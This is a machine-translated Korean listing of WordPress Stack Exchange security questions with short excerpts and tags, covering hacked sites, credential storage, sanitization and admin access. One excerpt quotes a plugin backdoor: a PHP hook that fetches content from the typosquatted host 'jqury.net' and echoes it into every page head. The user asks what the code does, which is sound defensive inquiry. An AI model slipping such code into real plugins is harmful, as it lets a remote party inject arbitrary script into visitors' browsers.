«security» 태그된 질문

닫은. 이 질문은 주제에 맞지 않습니다 . 현재 답변을받지 않습니다. 이 질문을 개선하고 싶습니까? WordPress Development Stack Exchange에 대한 주제가 되도록 질문을 업데이트하십시오 . 휴일 3 년 전 . 플러그인 Simple Login Lockdown을 설치했으며 며칠 전에 데이터베이스가 하루에 200 개가 넘는 레코드를 기록하고 있습니다. 내 사이트가 너무 많은 IP의 공격을받는 …

20 login  security 

최근에 해킹당한 고객이 있었으며 Â 및 Æ와 같은 사이트에 이상한 캐릭터가 나타나는 것을 알았습니다. 해커 wp_options가 데이터베이스 의 테이블에서 blog_charset을 UTF-7로 변경 한 것으로 나타났습니다 . UTF-8로 다시 설정했지만 UTF-7로 설정된 시간 동안 보안 취약점이 발생할 수 있는지 궁금합니다. 몇 가지 검색을 수행하여 버전 2.0.6에서 수정 된 WordPress UTF-7 취약점이 …

19 security  encoding  hacked  characters 

WordPress를 처음 사용합니다. 최근 해커가 플러그인의 취약점을 악용하는 방법에 대한 기사를 읽었습니다. Google Pagespeed와 같은 다양한 소스도 플러그인을 사용하지 못하거나 최소한으로 유지하지 못하게했습니다. 개인적으로, 나는 또한 내 사이트에서 일어나는 일에 대해 더 많은 통제력을 느끼기 때문에 플러그인을 피하려고 노력하고 하나를 다운로드하는 것은 거의 '사용 방법을 배워야하는 또 다른 것'과 같은 …

19 plugins  security 

현재 플러그인을 개발 중이며 다른 사람들이 사용할 수 있도록 공개 플러그인 저장소에서 릴리스 할 가능성이 높습니다. 플러그인은 API를 사용하며이 API를 사용하려면 사용자 이름과 비밀번호를 전달해야합니다. 따라서 플러그인은 이러한 로그인 자격 증명을 데이터베이스에 저장해야합니다. API가 일반 텍스트로 필요하지만 일반 텍스트로 저장하고 싶지 않습니다. 그래서 제 질문은 이러한 민감한 정보를 어떻게 저장합니까? …

19 plugin-development  security  api  encryption 

나는 이것을 플러그인에서 발견했다. 무엇을합니까? 위험한가요? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

데이터베이스에 들어가기 전에 그리고 브라우저로 출력하기 전에 플러그인 / 테마의 모든 데이터가 안전하게 처리되도록하고 싶습니다. 내 문제는 포스트 메타 필드를 저장할 때와 같이 API가 사용자를 위해 위생 처리를 처리하는 상황과 사용자 정의 설정을 저장할 때와 같이 플러그인 / 테마 작성자가 전적으로 책임을지는 상황이 있다는 것입니다. 이 질문의 범위에서, 나는 도메인 …

17 plugin-development  security  customization  validation  sanitization 

최신 버전의 워드 프레스에서 유지 wp-admin/install.php및 wp-admin/install-helper.php보안 유출이 발생합니까? 기본적으로 해당 파일에 대한 파일 권한은 644입니다. 새는 곳이 있다면 어떤 종류의 부탁입니까?

16 security  installation 

현재로서는이 질문이 Q & A 형식에 적합하지 않습니다. 답변, 사실, 참고 자료 또는 전문 지식을 통해 답변이 뒷받침 될 것으로 예상되지만이 질문은 토론, 논쟁, 여론 조사 또는 광범위한 토론을 요구할 것입니다. 이 질문을 개선하고 다시 열 수 있다고 생각 되면 도움말 센터 를 방문하여 안내를 받으십시오 . 휴일 칠년 전에 …

16 plugins  plugin-development  security  sql 

SVG는 미디어 업 로더에서 기본적으로 차단되어 있으며 functions.php에서 지원되는 MIME 유형으로 추가해야합니다. 이 뒤에 어떤 보안 이유가 있습니까?

15 media  security  svg 

나는 코드를 보았지만 같은 기능에서 탈출하는 the_title the_content the_excerpt것을 볼 수 없었습니다. 제대로 읽지 못할 수도 있습니다. 테마 개발에서 다음과 같은 기능을 피해야합니다. esc_html ( the_title () ) 편집 : 위의 코드 아래 답변에서 지적한 바와 같이 코드에 관계없이 잘못되었습니다. esc_html ( get_the_title () )

15 security  escaping 

외부 개발자에게 문제가 있습니다. VPN 액세스를 통해 wp-admin사이트 액세스를 내부 액세스로만 제한하려고합니다 . 단순히 외부 사용자의 공격을받지 않습니다. 우리는 사이트에서 관리자를 열거하고 피싱하기를 원하지 않을 수 있습니다. Google 개발자는 사이트에서 관리자 페이지를 외부에서 액세스 할 수 있어야 페이지가 작동하기 때문에 그렇게 할 수 없다고 말합니다. 특히 admin-ajax페이지. 뭐라고합니까 admin-ajax.php페이지는 무엇입니까? …

14 admin  ajax  security 

보안에 약간의 도움이 될 수있는 간단한 질문입니다. readme.html 파일에 버전 번호가 나열되어 있습니다. 각 업그레이드 후에 다시 나타나며 licence.txt 및 wp-config-sample.php도 나타납니다. 업그레이드 후 WordPress에서 이러한 파일을 자동으로 제거하는 쉬운 방법이 있습니까? 메타 태그, RSS 피드, 원자 등에서 버전 번호가 표시되지 않도록 차단했습니다. 나는이 보안 유형이 정확히 아니라는 것을 알고 …

13 security  wp-config 

응용 프로그램 내에서 업데이트하도록 WordPress (예 : WordPress)를 구성하는 것이 편리하기 때문에 이상적입니다. 그럼에도 불구하고 요구 사항에 어려움을 겪고 있습니다. PHP 용 ssh2를 설치 한 후 표시되는 요청 된 필드는 내 공개 키뿐만 아니라 개인 키도 묻습니다. 나는 공개 키만 필요할 것이라고 생각합니다. 서버가 올바른 소프트웨어 패키지를 서버에 업로드 할 …

13 security  updates  ssh 

대한 코덱스 보면 ) wp_insert_post ( 이이 기능을 "... 소독하라고 변수, 날짜 / 시간, 등과 같은 변수를 누락 일부 검사, 칠을한다"고 주장한다 (편집 : 나는 분과 항목 업데이트 보다 강력한 예을 포함을 메타 및 카테고리 할당뿐만 아니라 보안이 포함됨) XSS 해킹 등을 방지하기 위해 추가 위생 처리가 필요한지 또는 기능을 …

13 security  sanitization 

이로 인해 코딩이 어려워집니다. Wordpress 코덱은 보안에 대해 모호하게 이야기함으로써 esc_url을 사용하는 이유입니다. 그러나 그것은 정말로 문제의 가치가 있습니까? 예를 들어 다음을 사용하여 중요한 실질적인 보안 이점은 무엇입니까? <?php echo esc_url( home_url( '/' ) ); ?> 대신에 <?php echo home_url() ?> 추신 : 테마 개발이 아니라 특정 사이트에 대해 이야기하고 …

12 security